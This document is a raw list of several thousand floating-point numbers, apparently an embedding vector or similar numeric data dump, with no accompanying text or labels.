0.017978034913539886, 0.01905480958521366, 0.020390553399920464, -0.018359676003456116, 0.02441141940653324, -0.0360923707485199, 0.026973867788910866, 0.04225315526127815, -0.0030820949468761683, 0.0006836321554146707, -0.009377473965287209, 0.004327540751546621, -0.004521769005805254, -0.010447433218359947, 0.02291211299598217, -0.013732274994254112, -0.042880136519670486, -0.0023477759677916765, -0.01761002466082573, -0.0018724281108006835, -0.0006640389910899103, -0.0012420382117852569, -0.005060155875980854, 0.0005345534882508218, 0.025978874415159225, 0.004521769005805254, 0.012430605478584766, 0.004010641947388649, 0.002881051739677787, 0.02561086229979992, 0.007707793265581131, 0.011128935031592846, -0.000012092676115571521, -0.03020418994128704, -0.0011909255990758538, -0.004303688183426857, -0.025760794058442116, -0.0172283835709095, -0.003942491952329874, 0.022653141990303993, -0.000886805122718215, -0.003024167148396373, -0.010924484580755234, -0.03235773742198944, -0.013193887658417225, 0.02573353424668312, 0.0029372756835073233, 0.01701030135154724, -0.0025249666068702936, 0.026578595861792564, -0.03004062920808792, 0.0025215591304004192, -0.02794160135090351, -0.014843123964965343, 0.00010201240365859121, -0.01804618537425995, -0.010706404224038124, -0.02550182305276394, -0.021930750459432602, -0.002858902793377638, 0.00006538164598168805, 0.025488192215561867, 0.006903619971126318, 0.018455086275935173, -0.00516238110139966, 0.019477341324090958, -0.0055849128402769566, -0.0008301552152261138, -0.013739090412855148, -0.014870383776724339, 0.05670100450515747, 0.012648685835301876, -0.003141726367175579, 0.025542713701725006, -0.019313780590891838, -0.033257320523262024, 0.013602789491415024, -0.02268040180206299, -0.0011151083745062351, -0.013071217574179173, -0.03064035065472126, -0.03791879862546921, -0.0014038950903341174, -0.04555162414908409, -0.024316009134054184, -0.013630049303174019, -0.023034783080220222, -0.011796807870268822, -0.033311840146780014, -0.01532017532736063, -0.030340490862727165, 0.015470106154680252, 0.007128515746444464, -0.002852087840437889, 0.020622264593839645, -0.014120731502771378, -0.003703966038301587, 0.010208907537162304, 0.01101308036595583, -0.031376373022794724, -0.010331577621400356, 0.014625043608248234, -0.018850358203053474, -0.01811433583498001, 0.023062044754624367, 0.014366072602570057, 0.0007551899179816246, -0.0576278492808342, 0.014134361408650875, -0.003076983615756035, 0.004426358733326197, -0.027859821915626526, 0.010863149538636208, -0.012757726013660431, -0.019695421680808067, -0.03025870956480503, -0.006140337325632572, -0.0004987746360711753, 0.0153474360704422, 0.027900710701942444, 0.008457445539534092, 0.01526565570384264, 0.02054048515856266, 0.018291527405381203, -0.011496947146952152, -0.028077902272343636, 0.006712799426168203, 0.016764961183071136, 0.013071217574179173, 0.049776941537857056, -0.025351891294121742, 0.015074835158884525, -0.007230741437524557, 0.012273859232664108, 0.004794369917362928, -0.008627821691334248, 0.006569684017449617, 0.021562738344073296, -0.00101117929443717, -0.018645908683538437, 0.03472936525940895, 0.004865927621722221, 0.014120731502771378, 0.008205289952456951, -0.001063995761796832, -0.011824067682027817, 0.01634242944419384, -0.0063822707161307335, -0.010808628983795643, 0.004504731390625238, -0.021739929914474487, -0.0001739961007842794, 0.001100626541301608, -0.024970250204205513, 0.016247019171714783, -0.0038232288789004087, -0.006569684017449617, 0.0030139447189867496, -0.005002228077501059, 0.011769548058509827, 0.009268433786928654, -0.006692354567348957, -0.019531860947608948, -0.03170349448919296, -0.024874839931726456, 0.0025880057364702225, -0.028950225561857224, 0.001264187041670084, 0.004313910845667124, -0.011905848048627377, -0.006559461355209351, -0.007203481160104275, -0.01932740956544876, -0.0035335903521627188, 0.023048413917422295, -0.00387774920091033, 0.0015154911670833826, 0.020744934678077698, 0.017364682629704475, 0.004136720206588507, 0.004743257071822882, 0.002417630050331354, -0.00866871140897274, 0.019722681492567062, -0.03358444198966026, 0.009902231395244598, -0.03511100634932518, -0.009227543137967587, -0.009207098744809628, -0.010863149538636208, -0.011074415408074856, -0.04225315526127815, 0.034538544714450836, 0.016437839716672897, 0.01407984085381031, -0.04258027672767639, 0.008198474533855915, 0.016710441559553146, -0.015442846342921257, -0.0020376923494040966, 0.010386098176240921, -0.0012965584173798561, -0.005925664212554693, -0.029740767553448677, 0.03333910182118416, 0.00450132368132472, 0.012219339609146118, -0.02097664587199688, -0.019668161869049072, 0.001172184245660901, -0.004204870201647282, 0.006883175112307072, 0.0258425734937191, 0.0033138059079647064, -0.010808628983795643, 0.02054048515856266, -0.009534219279885292, 0.011899033561348915, -0.01849597692489624, 0.029359126463532448, 0.02501114085316658, 0.03666483238339424, 0.011108490638434887, -0.013480119407176971, -0.007087625563144684, -0.007700977846980095, 0.018945768475532532, 0.008246179670095444, 0.01542921643704176, 0.03532908856868744, -0.005925664212554693, 0.01104715559631586, -0.011837698519229889, 0.010058976709842682, 0.007932689040899277, 0.02285759337246418, -0.021003905683755875, 0.0068933977745473385, 0.01440696232020855, 0.006252785213291645, 0.013984430581331253, -0.0009796598460525274, 0.009363844059407711, 0.013630049303174019, 0.012219339609146118, -0.018904879689216614, -0.00161090143956244, -0.021508218720555305, -0.021848969161510468, -0.005397499538958073, 0.02805064246058464, -0.0025726717431098223, -0.029386386275291443, -0.023893477395176888, 0.0012258526403456926, 0.008034913800656796, -0.0009046945488080382, 0.012062594294548035, 0.021767189726233482, -0.017964405938982964, 0.01999528333544731, 0.022884853184223175, 0.0522303506731987, -0.024479569867253304, -0.005158973857760429, -0.033093761652708054, -0.0036255931481719017, -0.003956121858209372, 0.002318812068551779, -0.026196954771876335, -0.006927472539246082, -0.0031366152688860893, 0.021290138363838196, -0.012825876474380493, -0.03802783787250519, -0.01855049654841423, 0.011285681277513504, 0.029304606840014458, -0.003030982334166765, -0.010345207527279854, 0.023102933540940285, 0.014870383776724339, -0.012689576484262943, -0.0017386832041665912, 0.013009882532060146, -0.017460092902183533, 0.0168331116437912, 0.00350633030757308, 0.003295064438134432, -0.03666483238339424, 0.018959399312734604, -0.02048596367239952, -0.009697780013084412, 0.017705434933304787, -0.023198343813419342, 0.024261487647891045, -0.005847291089594364, -0.01448874268680811, -0.00130081782117486, -0.034429505467414856, -0.01551099680364132, 0.003267804393544793, 0.006917250342667103, -0.000401660508941859, 0.005141936242580414, -0.010910854674875736, 0.004794369917362928, 0.06384315341711044, 0.0010921077337116003, -0.014611412771046162, -0.0029202380683273077, 0.00429346552118659, -0.0004014475562144071, 0.013929910957813263, -0.004549028817564249, 0.029468167573213577, -0.028295982629060745, 0.012362455017864704, -0.028186943382024765, -0.018400566652417183, -0.006539016496390104, 0.02325286529958248, 0.025747163221240044, 0.013289297930896282, 0.0026476371567696333, 0.008989017456769943, 0.01532017532736063, -0.010229351930320263, 0.008682341314852238, 0.032766640186309814, 0.0006044075125828385, -0.01024298183619976, 0.0022455507423728704, -0.021290138363838196, 0.01943645067512989, -0.007728238124400377, 0.015592777170240879, -0.014093471691012383, -0.021835340186953545, -0.02848680317401886, 0.002187622943893075, 0.0005682026967406273, 0.0026612672954797745, -0.013793610036373138, 0.009561480022966862, 0.010638253763318062, 0.00015972714754752815, 0.006290267687290907, 0.0006005740724503994, -0.05443841964006424, -0.003056538524106145, 0.015129354782402515, -0.014338811859488487, 0.022598622366786003, 0.0019933946896344423, -0.0025573379825800657, 0.011973998509347439, 0.004882965236902237, -0.01987261138856411, 0.005901811644434929, 0.015115724876523018, 0.0011909255990758538, -0.0044331736862659454, 0.0022694033104926348, 0.011163010261952877, 0.005779141094535589, -0.0077895731665194035, -0.0001981681416509673, 0.011122120544314384, 0.014257031492888927, -0.016533249989151955, 0.0008442112011834979, 0.014052581042051315, -0.004453618545085192, -0.0006912990938872099, -0.008539225906133652, 0.032712120562791824, 0.0062357475981116295, -0.004371838178485632, 0.007442006841301918, -0.003690335899591446, 0.010863149538636208, 0.008723231963813305, 0.018577758222818375, 0.029195565730333328, -0.025760794058442116, -0.00458310404792428, 0.008839087560772896, 0.0306948721408844, 0.006344788242131472, 0.010399728082120419, 0.014093471691012383, 0.04974967986345291, -0.018400566652417183, -0.015974417328834534, -0.0026305995415896177, -0.01677859015762806, 0.02727372944355011, -0.002024062443524599, 0.026033394038677216, -0.019613642245531082, 0.004555844236165285, 0.0172283835709095, 0.016587769612669945, -0.01612434908747673, 0.0034058087039738894, 0.003881156677380204, -0.010508768260478973, 0.011142565868794918, 0.03263033926486969, 0.008798196911811829, -0.003710780991241336, 0.013275668025016785, 0.007394301705062389, -0.0020666562486439943, -0.03102199360728264, -0.001258223899640143, -0.0009455846739001572, 0.016465099528431892, -0.005465649999678135, -0.012491940520703793, -0.013807239942252636, -0.014093471691012383, 0.0026408222038298845, -0.0011474797502160072, 0.009009462781250477, -0.01590626873075962, -0.02522922120988369, -0.011019894853234291, 0.003381956135854125, 0.01677859015762806, 0.016410579904913902, -0.021126577630639076, 0.008232549764215946, -0.005329349543899298, 0.03936358168721199, 0.014979424886405468, 0.03246677666902542, 0.014911274425685406, 0.021780818700790405, 0.01882309839129448, 0.0017991665517911315, 0.01303032785654068, 0.02649681642651558, 0.004719404503703117, 0.0023631099611520767, -0.021003905683755875, 0.012055778875946999, 0.03263033926486969, -0.00916620809584856, -0.004528583958745003, 0.027205578982830048, -0.01679222099483013, -0.007026290521025658, 0.035628948360681534, -0.0017352757276967168, 0.028023382648825645, -0.004109459929168224, -0.00441613607108593, -0.024302378296852112, 0.026646746322512627, 0.0036460382398217916, 0.003414327511563897, -0.019681790843605995, -0.028350502252578735, -0.02711016871035099, -0.010692774318158627, 0.017855364829301834, 0.011694582179188728, 0.001453304081223905, 0.004007234703749418, -0.005969961639493704, 0.026360515505075455, 0.019027549773454666, -0.047786954790353775, -0.029795289039611816, -0.029440907761454582, -0.012076224200427532, 0.00030262969085015357, 0.007237556390464306, -0.015129354782402515, 0.0008045988506637514, 0.012730466201901436, -0.016192499548196793, 0.00847107544541359, 0.009479699656367302, -0.02130376733839512, 0.008593746460974216, 0.011367461644113064, -0.006300490349531174, -0.013773164711892605, 0.042035073041915894, 0.02821420319378376, 0.007414747029542923, -0.022721292451024055, -0.03941810503602028, -0.006085817236453295, 0.014911274425685406, 0.031485415995121, 0.005169196520000696, 0.003584702964872122, 0.006375455763190985, -0.01805981621146202, -0.02859584428369999, -0.004283242858946323, 0.034429505467414856, -0.02550182305276394, -0.025692643597722054, 0.009322954341769218, 0.0001257585099665448, -0.011272051371634007, 0.0060926321893930435, -0.04383423924446106, -0.018359676003456116, 0.003976567182689905, 0.0016194202471524477, -0.012968991883099079, 0.023607246577739716, 0.01242379005998373, -0.005312311928719282, 0.0109040392562747, -0.012580535374581814, -0.03074939176440239, 0.01523839496076107, -0.03241225704550743, -0.00847107544541359, 0.000256841245573014, 0.0075033423490822315, -0.003973159473389387, -0.00008289839024655521, -0.021835340186953545, -0.029086526483297348, 0.05342979356646538, 0.027423659339547157, -0.01706482283771038, -0.005319126881659031, 0.006903619971126318, 0.002879347885027528, -0.00952740479260683, 0.0015018611447885633, 0.009834080934524536, -0.004409321118146181, -0.0028367540799081326, 0.024329638108611107, -0.013534639030694962, 0.01156509667634964, -0.03532908856868744, -0.008920866996049881, -0.003213284071534872, -0.0236890260130167, 0.0018162040505558252, 0.005400907248258591, -0.0002491743362043053, -0.00018847803585231304, 0.0017097193049266934, -0.0015802339185029268, 0.016587769612669945, -0.005646247882395983, -0.016315169632434845, 0.0027038611005991697, 0.003881156677380204, -0.011040340177714825, -0.010481508448719978, 0.01051558367908001, -0.005503132473677397, 0.020186103880405426, 0.009738670662045479, 0.02131739817559719, -0.014502372592687607, -0.015660926699638367, -0.002032581251114607, -0.0030020184349268675, 0.01915021985769272, -0.05283007398247719, -0.006249377503991127, -0.00924798846244812, 0.004947707988321781, 0.01579722762107849, 0.02700112760066986, -0.00919346883893013, -0.0023290347307920456, -0.0010341800516471267, -0.008934497833251953, 0.023552725091576576, -0.02589709497988224, -0.019845351576805115, 0.008068989031016827, -0.009520589374005795, 0.020881235599517822, -0.022544102743268013, -0.034538544714450836, 0.03183979541063309, 0.0027226023375988007, -0.011892218142747879, -0.047950513660907745, -0.012328379787504673, -0.00001462834461563034, 0.006634426768869162, 0.00007709497003816068, -0.0006035556434653699, -0.01076773926615715, 0.004964745603501797, 0.000725800113286823, -0.026142435148358345, 0.021331027150154114, -0.0116468770429492, 0.005240754224359989, 0.017092082649469376, 0.04274383559823036, 0.003463736269623041, -0.009595555253326893, 0.01583811827003956, 0.029958849772810936, 0.018427826464176178, 0.01510209497064352, -0.011851328425109386, -0.008798196911811829, -0.012982621788978577, 0.00034160312497988343, -0.008464260958135128, -0.027232838794589043, -0.011899033561348915, -0.004102644976228476, -0.042198631912469864, 0.023879846557974815, -0.006958140525966883, 0.006375455763190985, 0.017242012545466423, -0.005213493946939707, 0.014297922141849995, -0.015592777170240879, -0.008770937100052834, 0.00424916809424758, 0.0013877094024792314, -0.006985400337725878, 0.01051558367908001, -0.011360646225512028, -0.006116484757512808, -0.019899873062968254, -0.023893477395176888, -0.011197085492312908, -0.010794999077916145, -0.026701267808675766, -0.01225341483950615, 0.015224765054881573, 0.00159812334459275, 0.00041656839312054217, -0.02540641278028488, 0.02805064246058464, 0.011135750450193882, 0.006610574200749397, -0.02054048515856266, -0.017160233110189438, 0.006539016496390104, 0.03884563967585564, -0.01374590490013361, -0.01596078835427761, -0.0006487051723524928, 0.005101046059280634, 0.014270662330091, -0.005710990633815527, 0.004051532130688429, 0.020117953419685364, 0.004998820833861828, 0.023334644734859467, 0.011578727513551712, 0.004140127450227737, -0.036855652928352356, -0.0010426987428218126, -0.009840895421802998, -0.02439778856933117, -0.016928521916270256, 0.009186653420329094, 0.0018196116434410214, 0.019477341324090958, -0.020513225346803665, 0.01717386208474636, 0.0012437420664355159, -0.01007260661572218, -0.016642291098833084, -0.003806191263720393, -0.030667612329125404, 0.0032712118700146675, 0.013766350224614143, -0.03494744747877121, -0.016969412565231323, 0.006658279336988926, -0.006498126313090324, 0.011081229895353317, -0.0022455507423728704, 0.019736312329769135, -0.019245630130171776, -0.015879007056355476, -0.007864538580179214, 0.0021416214294731617, -0.008130325004458427, 0.003588110441341996, -0.00321669178083539, 0.007612382527440786, -0.0022353280801326036, 0.011892218142747879, -0.027355508878827095, 0.02075856551527977, 0.008893607184290886, 0.011088045313954353, -0.0007275039097294211, -0.006927472539246082, 0.02396162785589695, 0.011953553184866905, -0.0072102961130440235, 0.005745065864175558, 0.01051558367908001, 0.006896805018186569, -0.015442846342921257, -0.0004167813458479941, 0.02374354563653469, -0.03388430178165436, 0.013357448391616344, 0.03388430178165436, 0.01200807373970747, -0.003557442920282483, 0.004879557527601719, 0.016301538795232773, -0.019027549773454666, -0.0379733182489872, -0.009268433786928654, 0.017964405938982964, 0.0030837988015264273, -0.008109879679977894, 0.0036324081011116505, -0.0031059475149959326, 0.014216141775250435, -0.00375507865101099, 0.0033563997130841017, -0.014870383776724339, -0.006903619971126318, 0.04715996980667114, 0.0031877278815954924, 0.018509607762098312, -0.0018281304510310292, 0.03170349448919296, -0.03058583103120327, -0.005762103479355574, -0.0288139246404171, -0.00008284514478873461, 0.006705984473228455, 0.0036528531927615404, 0.023866217583417892, -0.0011278865858912468, -0.004395691212266684, 0.0046853297390043736, -0.008041729219257832, -0.011387906037271023, 0.004235537722706795, 0.0014550078194588423, -0.007700977846980095, -0.03396608307957649, 0.012491940520703793, -0.0018996881553903222, 0.00861419178545475, 0.006222117692232132, 0.007884983904659748, -0.009500144980847836, 0.00791905913501978, 0.0063073053024709225, -0.0027958638966083527, 0.008982202969491482, 0.013636864721775055, -0.029113786295056343, 0.02765537053346634, -0.0015001572901383042, 0.013439228758215904, 0.014570523053407669, -0.0009575109579600394, -0.01104715559631586, -0.01688763126730919, -0.0018093890976160765, 0.010822259820997715, -0.001290595275349915, -0.015865378081798553, -0.022285131737589836, 0.014570523053407669, 0.01548373606055975, 0.0094933295622468, -0.0025011140387505293, 0.01666955091059208, 0.0018962806789204478, 0.024302378296852112, -0.0007475230377167463, -0.03306649997830391, 0.016315169632434845, 0.013950355350971222, 0.01833241619169712, 0.018918508663773537, 0.01156509667634964, -0.026646746322512627, 0.017746323719620705, -0.002468742663040757, -0.0223532821983099, -0.00783727876842022, 0.0035199602134525776, -7.420657084367122e-7, -0.006136929616332054, 0.017487352713942528, 0.00791905913501978, 0.00023660913575440645, -0.012580535374581814, -0.02103116735816002, -0.018468717113137245, 0.008621006272733212, -0.008082618936896324, 0.005496317520737648, 0.015224765054881573, 0.007278446573764086, 0.003881156677380204, 0.016110718250274658, -0.02385258674621582, -0.006044927053153515, -0.005278236698359251, 0.017160233110189438, 0.021998900920152664, -0.00466488441452384, 0.004378653597086668, 0.012478310614824295, -0.001535084331408143, 0.004204870201647282, -0.03483840823173523, 0.004116274882107973, 0.01518387533724308, -0.0010188461747020483, -0.019777201116085052, 0.00007954411557875574, 0.006201672367751598, -0.0006546683143824339, -0.008634636178612709, -0.01860501803457737, -0.01616523787379265, -0.003172394121065736, 0.00047577390796504915, -0.004273020662367344, -0.029059264808893204, 0.022230610251426697, 0.0047568874433636665, 0.03541086986660957, 0.006286860443651676, 0.009138948284089565, -0.008770937100052834, 0.005179418716579676, -0.027137428522109985, -0.006631019059568644, 0.010399728082120419, 0.0020905088167637587, -0.017242012545466423, 0.02627873606979847, -0.0013016697484999895, -0.008634636178612709, -0.005564467515796423, -0.0178962554782629, -0.0034228460863232613, -0.0002642951731104404, -0.008096249774098396, 0.010720034129917622, 0.025706272572278976, 0.0009984010830521584, 0.02330738492310047, 0.012232969515025616, -0.0040004197508096695, -0.019354671239852905, 0.014093471691012383, 0.007278446573764086, -0.004480878822505474, 0.010617808438837528, 0.020472334697842598, -0.004893187899142504, 0.0059904069639742374, 0.003068464808166027, -0.0007160035311244428, 0.011817253194749355, -0.015688186511397362, 0.020554114133119583, -0.0021211765706539154, -0.009384289383888245, -0.021344657987356186, -0.0011849624570459127, -0.020717674866318703, 0.02048596367239952, 0.022162459790706635, -0.011899033561348915, 0.0027021572459489107, -0.008464260958135128, 0.0001061120638041757, -0.01242379005998373, -0.0011440722737461329, -0.01104715559631586, 0.008314330130815506, -0.013507379218935966, -0.0011381091317161918, 0.009098057635128498, -0.005250976420938969, 0.006852507591247559, -0.0003051853273063898, -0.012798616662621498, -0.03126733377575874, -0.004082199651747942, -0.00116622110363096, -0.006699169520288706, 0.007271631620824337, -0.020022543147206306, -0.020172473043203354, -0.014434222131967545, 0.013309743255376816, 0.013139368034899235, -0.03399334475398064, 0.0336662232875824, -0.010208907537162304, -0.011415166780352592, -0.01382768526673317, 0.00026919349329546094, -0.016928521916270256, 0.004531991668045521, -0.015551886521279812, 0.019027549773454666, -0.0016560510266572237, -0.0016833110712468624, 0.00902990810573101, -0.012900842353701591, -0.014720453880727291, 0.006423160899430513, 0.021821709349751472, 0.008798196911811829, -0.0056564705446362495, 0.015701817348599434, 0.021549107506871223, 0.01788262464106083, -0.0010980708757415414, 0.012198894284665585, -0.01526565570384264, 0.015088465064764023, 0.017351053655147552, -0.009486514143645763, -0.00128037272952497, 0.022598622366786003, 0.039336323738098145, -0.024833951145410538, 0.0007309113861992955, 0.019245630130171776, -0.0022745144087821245, -0.0028469765093177557, -0.01954549178481102, -0.018591387197375298, 0.004037902224808931, -0.02727372944355011, -0.011217530816793442, -0.004603549372404814, -0.02362087555229664, 0.0018025740282610059, 0.004453618545085192, -0.0017497575609013438, 0.015769967809319496, -0.007373856846243143, 0.007700977846980095, -0.013895835727453232, -0.006729837041348219, -0.016764961183071136, -0.0273282490670681, 0.005295274313539267, -0.009868156164884567, -0.0021842154674232006, 0.017214752733707428, 0.005922256503254175, -0.00787135399878025, 0.01407984085381031, 0.017160233110189438, -0.006494718603789806, 0.020908495411276817, -0.007339781615883112, -0.00512149091809988, 0.0003100836183875799, 0.021985270082950592, -0.00838929507881403, 0.0020853974856436253, 0.005387276876717806, -0.017419204115867615, 0.010495138354599476, -0.013425598852336407, -0.019477341324090958, -0.009943121112883091, 0.0026902309618890285, 0.016642291098833084, 0.008907237090170383, -0.012675945647060871, -0.00833477545529604, -0.02407066710293293, -0.009595555253326893, -0.024356897920370102, -0.000954103481490165, -0.02445230819284916, 0.023389164358377457, -0.008184844627976418, -0.0009413252701051533, -0.013657310046255589, -0.010883594863116741, -0.007073995657265186, -0.02318471483886242, 0.009956751018762589, 0.0035812954884022474, 0.00536683201789856, 0.01699667237699032, -0.010386098176240921, -0.006392493378371, 0.008062174543738365, -0.0215354785323143, 0.014924904331564903, 0.03344814106822014, -0.015033944509923458, 0.0030429086182266474, -0.025311002507805824, 0.018032556399703026, -0.009513774886727333, 0.0026902309618890285, 0.006644648965448141, 0.012846321798861027, 0.023770807310938835, -0.015333806164562702, -0.014038951136171818, 0.005796178709715605, 0.006934287492185831, 0.01677859015762806, 0.03535635024309158, 0.009207098744809628, 0.0028384579345583916, -0.010876779444515705, -0.003543812781572342, -0.02280307374894619, -0.020908495411276817, -0.012001258321106434, 0.0026800085324794054, 0.0047534797340631485, 0.005676915869116783, 0.03053131140768528, 0.0306948721408844, -0.000021030740754213184, 0.006048334296792746, -0.0021825116127729416, -0.03053131140768528, 0.0048965951427817345, -0.006450421176850796, 0.008232549764215946, 0.007516972254961729, 0.013009882532060146, 0.0005541467107832432, -0.021944379433989525, -0.023321013897657394, -0.006027889437973499, -0.01214437372982502, 0.005022673401981592, 0.008927682414650917, -0.0023290347307920456, 0.011360646225512028, 0.028541324660182, 0.004133312497287989, 0.007523787207901478, 0.010890409350395203, -0.013057587668299675, 0.010999450460076332, -0.008982202969491482, 0.012403344735503197, -0.005714398343116045, 0.013377893716096878, 0.009350214153528214, 0.013377893716096878, 0.01162643264979124, 0.01717386208474636, 0.006119892466813326, -0.01606982760131359, -0.03407512232661247, -0.018087076023221016, -0.005693953018635511, -0.005748473573476076, -0.0018894656095653772, -0.005680323112756014, 0.006259600166231394, -0.008845902048051357, 0.00024704463430680335, -0.013043957762420177, 0.0014260439202189445, -0.019354671239852905, -0.0087504917755723, -0.00007012021524133161, 0.023784436285495758, -0.0053634243085980415, 0.03415690362453461, -0.008716416545212269, 0.014747713692486286, 0.0026323033962398767, 0.022707663476467133, -0.007959948852658272, -0.012376084923744202, 0.0015683076344430447, -0.005755288526415825, 0.010774553753435612, -0.010004456155002117, 0.015538256615400314, 0.0053327567875385284, 0.035247307270765305, -0.0012778171803802252, -0.01690126210451126, -0.00019380226149223745, -0.013677754439413548, 0.00012959195009898394, -0.0018076853593811393, -0.007844093255698681, 0.017800845205783844, -0.008273440413177013, 0.009425179101526737, 0.02146732807159424, 0.013657310046255589, -0.002366517437621951, 0.01523839496076107, -0.0004889780539087951, -0.020281514152884483, -0.022230610251426697, 0.005032895598560572, -0.015660926699638367, -0.008682341314852238, 0.007898613810539246, 0.023062044754624367, -0.0019133181776851416, 0.0007577455835416913, 0.01755550317466259, -0.0015367880696430802, -0.00891405250877142, -0.011122120544314384, 0.012628240510821342, -0.0331210196018219, 0.018959399312734604, -0.01382768526673317, -0.009309323504567146, -0.003051427425816655, -0.013541454449295998, -0.021903488785028458, 0.03181253746151924, 0.0015095280250534415, 0.007169405929744244, -0.017187492921948433, -0.009452439844608307, 0.0015734188491478562, 0.021944379433989525, 0.007080810610204935, 0.021903488785028458, 0.021235616877675056, -0.007346596568822861, -0.01883672922849655, -0.004054939839988947, 0.0063107130117714405, 0.0007922466029413044, 0.01051558367908001, 0.016710441559553146, 0.005240754224359989, -0.012532830238342285, -0.0013493748847395182, 0.02694660797715187, 0.00590521888807416, 0.011387906037271023, -0.011980813927948475, -0.007448822259902954, -0.020226992666721344, 0.02224424108862877, -0.01114938035607338, -0.012546461075544357, -0.0036801134701818228, -0.006719614379107952, 0.00919346883893013, -0.013398339040577412, -0.0012139262398704886, -0.030176930129528046, 0.000012957864782947581, 0.012021703645586967, 0.004862520378082991, 0.013064402155578136, -0.011353831738233566, -0.00701266061514616, 0.01954549178481102, 0.02208068035542965, 0.0000012678342500294093, -0.020963016897439957, 0.012382900342345238, 0.030613090842962265, 0.0020598412957042456, -0.0052611990831792355, -0.009615999646484852, -0.009759115055203438, -0.02280307374894619, -0.020281514152884483, 0.010760923847556114, 0.005622395314276218, -0.00855285581201315, -0.0160153079777956, -0.0009881785372272134, -0.008178030140697956, 0.007073995657265186, 0.009016278199851513, 0.0040992372669279575, -0.0012301119277253747, 0.004089015070348978, -0.00866871140897274, 0.021181097254157066, -0.005707583390176296, -0.00783727876842022, -0.011837698519229889, 0.02600613422691822, 0.013514193706214428, -0.0010725145693868399, -0.010140757076442242, 0.020908495411276817, 0.0067468746565282345, -0.00016696810780558735, 0.01799166575074196, 0.0039050092454999685, 0.005526985041797161, 0.014502372592687607, 0.0342114232480526, 0.008886792697012424, -0.039336323738098145, -0.009125318378210068, -0.0025726717431098223, 0.006862729787826538, 0.03410238400101662, 0.0033427695743739605, 0.008511966094374657, 0.009820451028645039, -0.0168331116437912, 0.00041167010203935206, 0.009881786070764065, 0.004750072490423918, 0.004470656160265207, -0.00015472236555069685, -0.00383685901761055, 0.009554664604365826, 0.0059904069639742374, -0.0002919812104664743, -0.025815313681960106, -0.0077214231714606285, 0.017909884452819824, -0.03748263791203499, -0.000756467750761658, 0.001969542121514678, 0.008989017456769943, -0.01510209497064352, 0.002976462012156844, 0.0023102934937924147, 0.001763387699611485, -0.014516002498567104, -0.010195276699960232, 0.007346596568822861, 0.01303032785654068, 0.0077895731665194035, 0.010256612673401833, 0.01226022932678461, -0.020063433796167374, -0.008791382424533367, 0.02363450638949871, 0.0032831381540745497, -0.0098272655159235, -0.007626012898981571, 0.031376373022794724, -0.004439988639205694, -0.009104873053729534, -0.033311840146780014, 0.010951744392514229, 0.010876779444515705, -0.0003758912207558751, 0.0004732182715088129, 0.0074011171236634254, 0.017405573278665543, -0.008137139491736889, 0.003847081447020173, -0.002346072345972061, 0.01275091152638197, 0.00913213286548853, 0.00817121472209692, 0.037291817367076874, 0.005002228077501059, -0.007687347941100597, 0.0016040864866226912, -0.009404733777046204, -0.0049715605564415455, -0.010542843490839005, 0.0069308802485466, -0.04129904881119728, -0.010815444402396679, -0.003393882419914007, -0.011742287315428257, -0.010345207527279854, 0.003443291177973151, 0.008205289952456951, 0.0030531310476362705, -0.007823648862540722, -0.003608555532991886, 0.013037142343819141, -0.006634426768869162, 0.013541454449295998, -0.014529632404446602, 0.0077895731665194035, -0.007557862438261509, 0.003473958931863308, -0.013043957762420177, 0.024029778316617012, -0.025883464142680168, 0.0034961076453328133, -0.01410710159689188, -0.0009966973448172212, 0.01142879668623209, -0.014856753870844841, 0.013132552616298199, 0.0007696718676015735, 0.006808209698647261, -0.010372467339038849, 0.014584152959287167, -0.002003617351874709, 0.013916281051933765, -0.002313700970262289, -0.012485125102102757, -0.01551099680364132, 0.011585542000830173, -0.020472334697842598, 0.003649445716291666, -0.008593746460974216, 0.007966764271259308, -0.017364682629704475, -0.02363450638949871, -0.02843228355050087, -0.02231239154934883, 0.013125738129019737, -0.016042567789554596, -0.0005405166302807629, -0.012437419965863228, 0.008655081503093243, 0.003007129766047001, 0.021767189726233482, 0.037237294018268585, 0.009145763702690601, 0.0016441247425973415, -0.006317527964711189, -0.005135121289640665, 0.00387774920091033, -0.003059946233406663, -0.013902650214731693, -0.003339362097904086, 0.0038845641538500786, -0.00018805208674166352, -0.006171004846692085, -0.009418364614248276, 0.015810856595635414, 0.006985400337725878, -0.012989437207579613, -0.009779560379683971, -0.004794369917362928, 0.0015061204321682453, -0.018850358203053474, -0.00013427728845272213, -0.012600980699062347, 0.012825876474380493, 0.004109459929168224, -0.005111268721520901, -0.01905480958521366, 0.015688186511397362, -0.0288139246404171, -0.016574140638113022, -0.008634636178612709, 0.006678724195808172, -0.0011185159673914313, -0.0011704805074259639, -0.0026987497694790363, -0.007462452165782452, -0.017214752733707428, -0.007844093255698681, 0.03208513557910919, 0.0003695021150633693, -0.006794579792767763, 0.0038947865832597017, 0.016315169632434845, -0.008852717466652393, -0.021126577630639076, -0.018400566652417183, 0.021835340186953545, -0.00044255066313780844, -0.01634242944419384, -0.011401536874473095, 0.02374354563653469, 0.0030037222895771265, 0.016083458438515663, -0.004146942403167486, 0.006276637781411409, -0.0069308802485466, 0.012553275562822819, 0.002516447799280286, -0.013705015182495117, -0.008770937100052834, 0.0024500014260411263, -0.006729837041348219, -0.023607246577739716, -0.007816833443939686, -0.00894812773913145, -0.0026680822484195232, -0.013875390402972698, -0.004647846799343824, -0.011292495764791965, -0.019790831953287125, -0.010392912663519382, -0.003204765496775508, 0.004010641947388649, 0.0059461090713739395, -0.0008305811206810176, 0.003102540038526058, -0.021794449537992477, 0.010461063124239445, 0.002664674771949649, -0.00046938483137637377, 0.01551099680364132, 0.00354722049087286, -0.0024721501395106316, 0.00260163564234972, -0.0033734373282641172, -0.0011917774099856615, -0.003513145260512829, -0.02490209974348545, -0.020881235599517822, 0.021835340186953545, 0.002831642748787999, 0.003441587556153536, -0.010583733208477497, -0.005867736414074898, -0.008866347372531891, 0.0011577022960409522, 0.01589263789355755, -0.014802234247326851, 0.003744856221601367, -0.018809467554092407, 0.0024517052806913853, -0.0009472884703427553, 0.008736861869692802, 0.006010851822793484, -0.012621426023542881, -0.020349664613604546, 0.00027771227178163826, 0.007735053077340126, -0.02700112760066986, -0.013118922710418701, 0.008702786639332771, -0.013214332982897758, 0.00025556344189681113, -0.002787345089018345, 0.0009379177936352789, -0.009425179101526737, 0.012675945647060871, 0.018782207742333412, -0.028132421895861626, -0.02567901276051998, 0.028623104095458984, 0.005032895598560572, 0.018305156379938126, -0.000028963855584152043, -0.014011691324412823, -0.0073602269403636456, 0.0056530628353357315, 0.010501952841877937, 0.02667400613427162, 0.006242562551051378, -0.01374590490013361, -0.005595135502517223, -0.023838955909013748, -0.020554114133119583, 0.0012590758269652724, 